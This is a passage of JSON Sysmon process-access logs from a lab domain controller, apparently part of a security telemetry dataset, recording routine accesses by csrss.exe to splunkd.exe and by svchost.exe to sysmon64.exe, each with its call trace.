05:48:41.043","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3085,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.043\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.043","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3086,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.043\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.043","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3087,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.043\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.043","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3088,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.043\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.043","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3089,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.043\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.043","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3090,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.043\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.043","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3091,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.043\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.043","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3092,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.043\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.043","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\nt